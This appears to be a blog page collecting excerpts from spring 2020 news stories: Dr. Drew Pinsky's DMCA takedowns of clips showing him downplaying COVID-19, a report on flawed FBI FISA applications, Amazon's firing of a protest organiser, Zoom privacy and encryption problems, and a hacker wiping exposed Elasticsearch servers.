Update: The full video is now back up and it’s even worse than the original clip we posted. It’s unclear if it went back up thanks to YouTube deciding it was fair use, or Pinsky removing the bogus takedown. Either way, watch it here:

Copyright system supporters keep insisting to me that copyright is never used for censorship, and yet over and over again we keep seeing examples that prove that wrong. The latest is Dr. Drew Pinsky, the somewhat infamous doctor and media personality, who has been one of the more vocal people in the media playing down the impact of the coronavirus. In a video that had gone viral on Twitter and YouTube, it showed many, many, many clips of Dr. Drew insisting that COVID-19 was similar to the flu, and that it wouldn’t be that bad. Assuming it hasn’t been taken down due to a bogus copyright claim, you can hopefully see it below:

As you can see, for well over a month, deep into March when it was blatantly obvious how serious COVID-19 was, he was playing down the threat. Beyond incorrectly comparing it to the flu (saying that it’s “way less virulent than the flu” on February 4th — by which time it was clearly way more virulent than the flu in China), he said the headlines should say “way less serious than influenza,” he insisted that the lethality rate was probably around “0.02%” rather than the 2% being reported. On February 7th, he said your probability of “dying from coronavirus — much higher being hit by an asteroid.” He also mocked government officials for telling people to stay home, even at one point in March saying he was “angry” about a “press-induced panic.” On March 16th, the same day that the Bay Area in California shut down, he insisted that if you’re under 65 you have nothing to worry about, saying “it’s just like the flu.” This was not in the distant past. At one point, a caller to his show, again on March 16th, said that because it’s called COVID-19 that means there were at least 18 others of them, and that’s why no one should worry — and Drew appeared to agree, making it appear he didn’t even know that the 19 refers to the year not the number of coronaviruses, and even though there are other coronaviruses out there, this one was way more infectious and deadly, so it doesn’t matter.

To give him a tiny bit of credit, on Saturday, Pinsky posted a series of choppy videos on Twitter in which he flat out said that he was wrong and he was sorry for his earlier statements, and said that he regretted his earlier statements. He also claimed that he signed up to help in California and NY if he was needed. But, even that apology seems weak in the face of what else he said in those videos… and, more importantly, his actions. In terms of what he said, he kept saying that he always said to listen to Dr. Fauci and to listen to your public health officials. Amazingly, at one point in his apology video, he insists that he thinks the real reason why New York got hit so bad is because of hallways and trains. Yet, in the video above, at one point he literally mocks NYC Mayor de Blasio for telling people to avoid crowded trains, saying: “de Blasio told them not to ride the trains! So they’re not riding the trains! So I am! [guffaw] I mean, it’s ridiculous.”

Given that, it’s a bit difficult to take him seriously when he claims that all along he always said to listen to your public officials, when just a few weeks ago he was mocking them. Indeed, as multiple people have pointed out, the issue here isn’t so much that Pinsky was wrong — in the early days, when there wasn’t as much info, lots of people got things wrong about COVID-19 (though Pinsky kept it up way way after most others recognized how serious it was), but that he acted so totally sure about his opinions that this was nothing to worry about. It was the certainty with which he said what he said that was so much of the problem, including deep into it already being a pandemic with local officials warning people to stay home.

But, even worse, just as he was doing the right thing and mostly apologizing… he was trying to hide those earlier clips that made him look so, so, so bad. His organization began sending out DMCA notices. If you went to the original YouTube upload you got this:

That says: “This video is no longer available due to a copyright claim by Drew Pinsky Inc.” Now, some might argue that it was just some clueless staffer working for Dr. Drew sending off bogus DMCAs, or maybe an automated bot… but nope. Drew himself started tweeting nonsense about copyright law at people. I originally linked to that tweet, but sometime on Sunday, after thousands of people — including some of the most famous lawyers in the country — explained to him why it was nonsense, he deleted it. But I kept a screenshot:

That says, amazingly:

Infringing copywrite laws is a crime. Hang onto your retweets. Or erase to be safe.

The wrongness-to-words ratio in that tweet is pretty fucking astounding. First of all, the layup: it’s copyright, Drew, not copywrite. Make sure you know the name of the fucking law you’re abusing to censor someone before tossing it out there. Second, no, infringing copyright is not a crime. Yes, there is such a thing as criminal copyright infringement, but this ain’t it. Someone posting a video of you would be, at best, civil infringement. For it to be criminal, someone would have to be making copies for profit — like running a bootleg DVD factory or something. Someone posting a 2 minute clip of your nonsense is not that.

Most important, however, this isn’t even civil infringement, thanks to fair use. Putting up a 2 minute video showing a dozen or so clips of Drew making an ass of himself is not infringing. It’s classic fair use — especially given the topic at hand.

So it’s really difficult to believe that Drew is really owning up to his mistakes when at the same time he says he’s sorry, he’s actively working to abuse the law to try to silence people from highlighting his previous comments. Also, someone should point him to Lenz v. Universal in which a court said that before sending a takedown, you need to take fair use into consideration. It certainly appears that Drew hasn’t the foggiest idea how copyright law works, so it seems unlikely he considered fair use at all.

I certainly understand that he likely regrets his earlier comments. And I appreciate his willingness to admit that he was wrong. But to really take ownership of your previous errors, you shouldn’t then be working doubletime to try to delete them from the internet and hide them from view. That’s not taking ownership of your mistakes, that’s trying to sweep them under the rug.

Source: Dr. Drew Pinsky Played Down COVID-19, Then Tries To DMCA Away The Evidence | Techdirt

For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog

Posted on by

Analysis The FBI has not followed internal rules when applying to spy on US citizens for at least five years, according to an extraordinary report [PDF] by the Department of Justice’s inspector general.

The failure to follow so-called Woods Procedures, designed to make sure the FBI’s submissions for secret spying are correct, puts a question mark over more than 700 approved applications to intercept and log every phone call and email made by named individuals.

Under the current system, the Feds apply to the Foreign Intelligence Surveillance Court (FISC), which can then grant the investigative agency extraordinary spying powers. These can also be granted retroactively if the agency needs to move quickly.

Back in 2001, however, a number of FISA warrants were found to have been granted on unverified information, driving the creation of the Woods Procedures, named after the FBI official who drew them up, Michael Woods.

Following a review last year of one of those successful applications that targeted a Trump campaign staffer called Carter Page, the FBI was found to have made “fundamental and serious errors” in its application. Inspector general Michael Horowitz then expanded his review to another 29 applications dated from October 2014 to September 2019 out of a pool of over 700 and found the same problems in every single other case he looked at, pointing to a systemic problem.

As a result, more than five years’ worth of secret spying activities by the US government may be illegitimate. Horowitz found the same “basic and fundamental errors” in every application.

Unaccountable

The FISA Court has long been highlighted by critics as an unaccountable body with extraordinary powers. Except for very rare occasions, only one side – the government – can present its case to the judges and as a result the court has approved almost every application. The process is wide open to abuse, critics have argued, and so it turns out to have been the case.

The Woods Procedures include things like sufficient supporting documentation of any assertions, a second review of any facts and assertions, and a re-verification of facts whenever an extension is applied for. They are a check and balance on power.

“We do not have confidence that the FBI has executed its Woods Procedures in compliance with FBI policy,” the report states.

It says that it couldn’t review files for four of the 29 selected FISA applications because the FBI has not been able to locate them and, in three of these instances, did not know if the files ever existed.

All of the 25 applications reviewed had “inadequately supported facts,” and “FBI and NSD officials we interviewed indicated to us that there were no efforts by the FBI to use existing FBI and NSD oversight mechanisms.”

Ah yeah but it’s all fixed now

Somewhat amazingly, the FBI doesn’t dispute the findings. The inspector general provided his report to the FBI and prosecutors for their feedback, and appended their responses to the report.

Neither the Feds nor the Dept of Justice denies the assertion that the FBI has not followed its own rules. And both argue that recent proposed changes, prompted solely by the inspector general’s previous report and which critics assert do not go far enough, have effectively fixed the issues.

There is no mention in either response or in the inspector general’s report of what the implications are for the hundreds of people that have been subject to secret spying orders that allow federal agents to track everything that person does and says.

But then, there may not be any implications because under the FISA rules, the person subjected to the spying is not informed of the order against them, even when the spying is over. And they are not even entitled to know or see any evidence compiled against them as a result of the spying operation, even if they are charged as a result of the spying.

It is, in short, a sign that the FBI cannot be trusted to follow its own rules even when those rules apply to the most invasive powers it can be given

Source: For the past five years, every FBI secret spy court request to snoop on Americans has sucked, says watchdog • The Register

Amazon says it fired a guy for breaking pandemic rules. Same guy who organized a staff protest over a lack of coronavirus protection

Posted on by

On Monday, Amazon fired Chris Smalls, a worker at its Staten Island, New York, warehouse, who had organized a protest demanding more protection for workers amid the coronavirus outbreak.

Smalls, in a statement, said, “Amazon would rather fire workers than face up to its total failure to do what it should to keep us, our families, and our communities safe. I am outraged and disappointed but I am not shocked. As usual, Amazon would rather sweep a problem under the rug than act to keep workers and working communities safe.”

Amazon spokesperson Kristen Kish denied the firing had anything to do with protected labor activity. “We did not terminate Mr Smalls employment for organizing a 15-person protest,” she said in an emailed statement. “We terminated his employment for putting the health and safety of others at risk and violations of his terms of his employment.”

Strike organizers have disputed Amazon’s attendance figures, claiming about 50 people walked out.

Kish said Smalls had received multiple warnings for violating social distancing guidelines and had been asked to remain home with pay for two weeks because he had been in the proximity of another worker confirmed to have COVID-19. By ignoring that instruction and coming on-site, she said, he was putting colleagues at risk.

Concern about health safety has spread across Amazon’s workforce. Workers at Amazon’s Whole Foods grocery chain on Tuesday staged a sick-out, demanding 2x hazard pay for working in stores where they may be exposed to coronavirus.

The company last month boosted pay for Amazon and Whole Foods hourly employees in the US and Canada by $2 an hour and £2 per hour for employees in the UK during the month of April. And it said it would double its hourly base rate – ranging from $17.50 to $23/hour at JFK8, its Staten Island warehouse – for overtime from March 16, 2020 through May 3, 2020. The company has also offered two weeks of pay for workers quarantined for coronavirus.

Source: Amazon says it fired a guy for breaking pandemic rules. Same guy who organized a staff protest over a lack of coronavirus protection • The Register

A Feature on Zoom Secretly Displayed Data From People’s LinkedIn Profiles

Posted on by

But what many people may not know is that, until Thursday, a data-mining feature on Zoom allowed some participants to surreptitiously have access to LinkedIn profile data about other users — without Zoom asking for their permission during the meeting or even notifying them that someone else was snooping on them.

The undisclosed data mining adds to growing concerns about Zoom’s business practices at a moment when public schools, health providers, employers, fitness trainers, prime ministers and queer dance parties are embracing the platform.

An analysis by The New York Times found that when people signed in to a meeting, Zoom’s software automatically sent their names and email addresses to a company system it used to match them with their LinkedIn profiles.

The data-mining feature was available to Zoom users who subscribed to a LinkedIn service for sales prospecting, called LinkedIn Sales Navigator. Once a Zoom user enabled the feature, that person could quickly and covertly view LinkedIn profile data — like locations, employer names and job titles — for people in the Zoom meeting by clicking on a LinkedIn icon next to their names.

The system did not simply automate the manual process of one user looking up the name of another participant on LinkedIn during a Zoom meeting. In tests conducted last week, The Times found that even when a reporter signed in to a Zoom meeting under pseudonyms — “Anonymous” and “I am not here” — the data-mining tool was able to instantly match him to his LinkedIn profile. In doing so, Zoom disclosed the reporter’s real name to another user, overriding his efforts to keep it private.

Reporters also found that Zoom automatically sent participants’ personal information to its data-mining tool even when no one in a meeting had activated it. This week, for instance, as high school students in Colorado signed in to a mandatory video meeting for a class, Zoom readied the full names and email addresses of at least six students — and their teacher — for possible use by its LinkedIn profile-matching tool, according to a Times analysis of the data traffic that Zoom sent to a student’s account.

The discoveries about Zoom’s data-mining feature echo what users have learned about the surveillance practices of other popular tech platforms over the last few years. The video-meeting platform that has offered a welcome window on American resiliency during the coronavirus — providing a virtual peek into colleagues’ living rooms, classmates’ kitchens and friends’ birthday celebrations — can reveal more about its users than they may realize.

“People don’t know this is happening, and that’s just completely unfair and deceptive,” Josh Golin, the executive director of the Campaign for a Commercial-Free Childhood, a nonprofit group in Boston, said of the data-mining feature. He added that storing the personal details of schoolchildren for nonschool purposes, without alerting them or obtaining a parent’s permission, was particularly troubling.

Source: A Feature on Zoom Secretly Displayed Data From People’s LinkedIn Profiles – The New York Times

A hacker has wiped, defaced more than 15,000 Elasticsearch servers

Posted on by

For the past two weeks, a hacker has been breaking into Elasticsearch servers that have been left open on the internet without a password and attempting to wipe their content, while also leaving the name of a cyber-security firm behind, trying to divert blame.

According to security researcher John Wethington, one of the people who saw this campaign unfolding and who aided ZDNet in this report, the first intrusions began around March 24.

The attacks appear to be carried with the help of an automated script that scans the internet for ElasticSearch systems left unprotected, connects to the databases, attempts to wipe their content, and then creates a new empty index called nightlionsecurity.com.

The attacking script doesn’t appear to work in all instances, though, as the nightlionsecurity.com index is also present in databases where the content has been left intact.

However, on many Elasticsearch servers, the wiping behavior is obvious, as log entries simply cut off around recent dates, such as March 24, 25, 26, and so on. Due to the highly volatile nature of data stored inside Elasticsearch servers, it is hard to quantify the exact number of systems where data was deleted.

Night Lion Security denies any involvement

In a Signal conversation with this reporter yesterday, Vinny Troia, the founder of Night Lion Security, has denied that his company had anything to do with the ongoing attacks.

In an interview he gave DataBreaches.net on March 26, Troia said he believes the attack is being carried out by a hacker he has been tracking for the past years, and who is also the subject of a recently released book.

Source: A hacker has wiped, defaced more than 15,000 Elasticsearch servers | ZDNet

Zoom’s Flawed Encryption Linked to China

Posted on by

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom’s “waiting room” feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university’s Citizen Lab — widely followed in information security circles — that Zoom’s service is “not suited for secrets” and that it may be legally obligated to disclose encryption keys to Chinese authorities and “responsive to pressure” from them.

Source: Zoom’s Flawed Encryption Linked to China

Thousands of recorded Zoom Video Calls Left Exposed on Open Web

Posted on by

Thousands of personal Zoom videos have been left viewable on the open Web, highlighting the privacy risks to millions of Americans as they shift many of their personal interactions to video calls in an age of social distancing. From a report: Many of the videos appear to have been recorded through Zoom’s software and saved onto separate online storage space without a password. But because Zoom names every video recording in an identical way, a simple online search can reveal a long stream of videos that anyone can download and watch. Zoom videos are not recorded by default, though call hosts can choose to save them to Zoom servers or their own computers. There’s no indication that live-streamed videos or videos saved onto Zoom’s servers are publicly visible. But many participants in Zoom calls may be surprised to find their faces, voices and personal information exposed because a call host can record a large group call without participants’ consent.

Source: Thousands of Zoom Video Calls Left Exposed on Open Web – Slashdot